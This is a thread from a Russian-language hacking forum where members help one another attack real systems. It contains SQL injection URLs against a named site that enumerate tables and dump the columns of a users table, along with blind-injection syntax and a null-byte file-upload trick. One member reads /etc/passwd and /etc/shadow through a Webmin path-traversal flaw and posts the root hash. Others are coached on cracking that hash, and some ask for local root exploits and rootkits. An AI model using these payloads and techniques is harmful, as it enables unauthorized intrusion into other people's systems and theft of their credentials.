Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,548
    Likes Received:
    1,244
    Reputations:
    273
    LokbatanLi
    Прочитай то что тебе люди рекомендуют, если бы перевел захексенное в текст в последнем моем запросе для тебя, то о чудо там бы и ссыль на как ракрутить скулю была и еще многие ответы на твои вопросы, а если тебе не подобрать число столбцов в скуле то или ищи в другом месте скулю с выводом , или крути cкулю как слепую (блайнд)
    http://www.xxx.com/news.php?iid=1+AND+SUBSTRING((version())=x
    где х меняешь в соответствие с запросом...
    или
    http://www.xxx.com/news.php?iid=1+AND+ASCII(SUBSTRING((version() ),1,1))>char твоего запроса
    www.translit.ru обеспечит нормальное отношение к тебе и позволит сформулировать вопрос на который можно будет ответить ...
     
  2. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    vot naprimer

    http://www.uptc.ru/show_id.php?id=-9+union+select+1,2,3,4,5,6,7+from+users/*

    zdes est 4,5 koqda etu ne videmsya a kak uznat columns name v kakom nomere??
     
  3. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,548
    Likes Received:
    1,244
    Reputations:
    273
    LokbatanLi
    Меня поражает ваше упорство задавать такие дурацкие вопросы...вы вообще читаете что вам люди отвечают и рекомендуют? если вы не считаете нужным следовать советам участникам форума, то зачем же тогда спрашивать?или вам всю статью про скули и раскрутку их суда переписать? Вы случаем не ошиблись? видимо из вас не то что хакера..ламера нормального не получится...
    З.Ы. Прошу модеров не считать мои высказывания за флуд !
     
  4. keng

    keng Member

    Joined:
    9 Apr 2008
    Messages:
    60
    Likes Received:
    43
    Reputations:
    8
    Не совсем тебя понял, но попытаюсь предположить:

    Выводимые поля: 4,5.

    Вместо любого из них поставляем version(). Запрос принимает вид:
    Code:
    http://www.uptc.ru/show_id.php?id=-9+union+select+1,2,3,version(),5,6,7/*
    Если версия 5, значит нам доступна information_schema, tables и columns соответственно.

    Опять видоизменяем запрос. Допустим, нужно увидеть имя первой таблицы. Тогда:

    Code:
    http://www.uptc.ru/show_id.php?id=-9+union+select+1,2,3,4,table_name,6,7+from+information_schema.tables/*
    Чтобы увидеть остальные - используем LIMIT, group_concat и иже с ними. Как именно - ищем на этом форуме, всё подробно описано.

    Далее - хотим узнать имя колонки. Делаем запрос:

    Code:
    http://www.uptc.ru/show_id.php?id=-9+union+select+1,2,3,column_name,5,6,7+from+information_schema.columns/*
    Нужную перебираем тем же способом, что и имена таблиц.


    Я тебя правильно понял, или всё ещё нет?
     
  5. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    offf blin zdes est nomerki 4,5 a esli bi ix ne bival 4to zdelali?? kak mojem uznat v kakom nomere sidyat columns name
     
  6. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,548
    Likes Received:
    1,244
    Reputations:
    273
    LokbatanLi ну ты ёпрст задолбал уже..нет вывода ..значит крути как слепую...я тебе же написал выше...
    З.Ы. В таджикистоне тоже каникулы?
     
    2 people like this.
  7. keng

    keng Member

    Joined:
    9 Apr 2008
    Messages:
    60
    Likes Received:
    43
    Reputations:
    8
    Вот рабочий пример для твоей ссылки:
    Code:
    http://www.uptc.ru/show_id.php?id=-9+union+select+1,2,3,4,group_concat(0x20,column_name),6,7+from+information_schema.columns+where+table_name=0x7573657273/*
    Вывод колонок из таблицы "users' (0x7573657273 - имя таблицы в hex).
     
    1 person likes this.
  8. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    Gorev, nu pocti ti menya i ya tebya ponel kak blind sql budet??
     
  9. keng

    keng Member

    Joined:
    9 Apr 2008
    Messages:
    60
    Likes Received:
    43
    Reputations:
    8
    Blind-injection рассмотрена в статье, ссылку на которую я давал несколькими постами выше.
     
  10. p.r0phe.t

    p.r0phe.t Member

    Joined:
    22 Aug 2009
    Messages:
    94
    Likes Received:
    8
    Reputations:
    0
    Подскажите,запускаю локал рут сплойт на шеле пишет
    No job control on this shell
    Система Debian Linux yesclub 2.6.18-6-686. Cплойт собран на OpenSuse 11,причём её он с радостью порутал =)
    В чём трабла?
    P.s. я понимаю,что не хочет работать на этом шеле,вопрос почему?
    P.S.S. Уффф,порутал. =)
    Зыыы Посоветуйте свежий паблик (можно и не паблик =)) руткит под Linx Debian с сцылкой желательно и выложите,если у кого есть, ваниш собранный,никак не хочет компилиься. =( С меня репа =)
     
    #9650 p.r0phe.t, 31 Oct 2009
    Last edited: 31 Oct 2009
    1 person likes this.
  11. bons

    bons Elder - Старейшина

    Joined:
    20 Dec 2007
    Messages:
    286
    Likes Received:
    121
    Reputations:
    21
    кто либо пользовался этим эксплойтом http://milw0rm.com/exploits/7581 ?
    (FreeBSD 6x/7 protosw kernel Local Privledge Escalation Exploit)
    написано запускать так: usage: ./x <allproc>\n
    что за параметр allproc?
     
  12. wolmer

    wolmer Member

    Joined:
    12 May 2009
    Messages:
    445
    Likes Received:
    97
    Reputations:
    9
    Null байт не действует при аплоаде в систему виндувс? (php)
     
    #9652 wolmer, 31 Oct 2009
    Last edited: 31 Oct 2009
  13. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    В функциях copy() и move_uploaded_file() null-байт работает, если же он экранируется, то можно воспользоваться тем, что php проводит нормализацию пути и обрезает значение по превышении MAXPATHLEN:
     
  14. DrakonSerg

    DrakonSerg Member

    Joined:
    16 Apr 2009
    Messages:
    66
    Likes Received:
    17
    Reputations:
    -1
    Не знаю, тут ли постю. Если что - прошу прощения. Ранее получал доступ в админку по линку http://192.168.0.1. В логин или пароль (1' or 1=1/*) и получил права. Спалили, поменяли. Поставил админ WEBMIN. Приконектився к 10000 порту. Скуль не проходит. Нарыл такую вот штуку
    PHP:
    http://192.168.0.1:10000/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/passwd
    показывает это (урывок): root:x:0:0:root:/root:/bin/bash
    bin:x:1:1:bin:/bin:/sbin/nologin
    daemon:x:2:2:daemon:/sbin:/sbin/nologin
    adm:x:3:4:adm:/var/adm:/sbin/nologin
    lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
    sync:x:5:0:sync:/sbin:/bin/sync
    shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
    halt:x:7:0:halt:/sbin:/sbin/halt
    mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
    news:x:9:13:news:/etc/news:
    uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin

    И такую:
    PHP:
    http://192.168.0.1:10000/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/shadow
    Показывает такое (урывок):
    root:$1$8HEzo141$IVXTh333KnXkPgNHjr3MP.:14547:0:99999:7:::
    bin:*:14346:0:99999:7:::
    daemon:*:14346:0:99999:7:::
    adm:*:14346:0:99999:7:::
    lp:*:14346:0:99999:7:::
    sync:*:14346:0:99999:7:::
    shutdown:*:14346:0:99999:7:::
    halt:*:14346:0:99999:7:::
    mail:*:14346:0:99999:7:::
    news:*:14346:0:99999:7:::
    uucp:*:14346:0:99999:7:::

    Можно логин-пароль найти в этих данных?
     
  15. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    ->
    Интересный, кстати говоря, случай.
    Чтобы расшифровать пароля рута используй JohnTheRipper
    --
    Баг оказался древним
    http://www.fduran.com/blog/webmin-vulnerability-exposing-your-password-or-any-file/
     
  16. DrakonSerg

    DrakonSerg Member

    Joined:
    16 Apr 2009
    Messages:
    66
    Likes Received:
    17
    Reputations:
    -1
    JohnTheRipper для *nix. Для винды тоже есть, только как им пользоваться ... просцу. Подскажите, что это за хеш? Какой алг его расшифровки. И где логин? ( Если туплю, сорри. Я не хакер, я просто бесплатного интернета хочу. Потому прошу помощи)

    Нашел руководство по JohnTheRipper. Теперь проблема в другом.
    JTR нужно кормить файлом с содержимым
    root:6xp8Tw7//32x2:0:0:root:/:/bin/bash
    А у меня содержимое в shadow
    root:$1$8HEzo141$IVXTh333KnXkPgNHjr3MP.:14547:0:99999:7:::
    А в passwd:
    root:x:0:0:root:/root:/bin/bash

    Западло. Что делать?
     
    #9656 DrakonSerg, 31 Oct 2009
    Last edited: 31 Oct 2009
  17. DrakonSerg

    DrakonSerg Member

    Joined:
    16 Apr 2009
    Messages:
    66
    Likes Received:
    17
    Reputations:
    -1
    Всем спасибо. Может кому пригодится: получил root скриптом
    PHP:
    <?php phpinfo() ?>
    Админ продолжает сосать)))
     
    4 people like this.
  18. treekool

    treekool New Member

    Joined:
    5 Jul 2008
    Messages:
    16
    Likes Received:
    2
    Reputations:
    0
    Хеш: FreeBSD MD5
    Логин: Root
    На счёт алгоритма в google поищи.
    ------------
    Просто скопируй root:$1$8HEzo141$IVXTh333KnXkPgNHjr3MP.:14547:0:99 999:7::: в файл shadow
    и переберай джоником ./john shadow
     
  19. treekool

    treekool New Member

    Joined:
    5 Jul 2008
    Messages:
    16
    Likes Received:
    2
    Reputations:
    0
    Сорри, не пропустил последний пост :))
     
  20. treekool

    treekool New Member

    Joined:
    5 Jul 2008
    Messages:
    16
    Likes Received:
    2
    Reputations:
    0
    Подскажите пожалуста, возможно ли проснифать трафик хоста например 192.168.2.1 c машины с адресом 192.168.1.1 разделлённые маршрутизатороми, если хост 192.168.1.1 физически соединён только с маршрутизатором, и в ARP таблици только адрес этого маррутизатора?
     
Loading...
Thread Status:
Not open for further replies.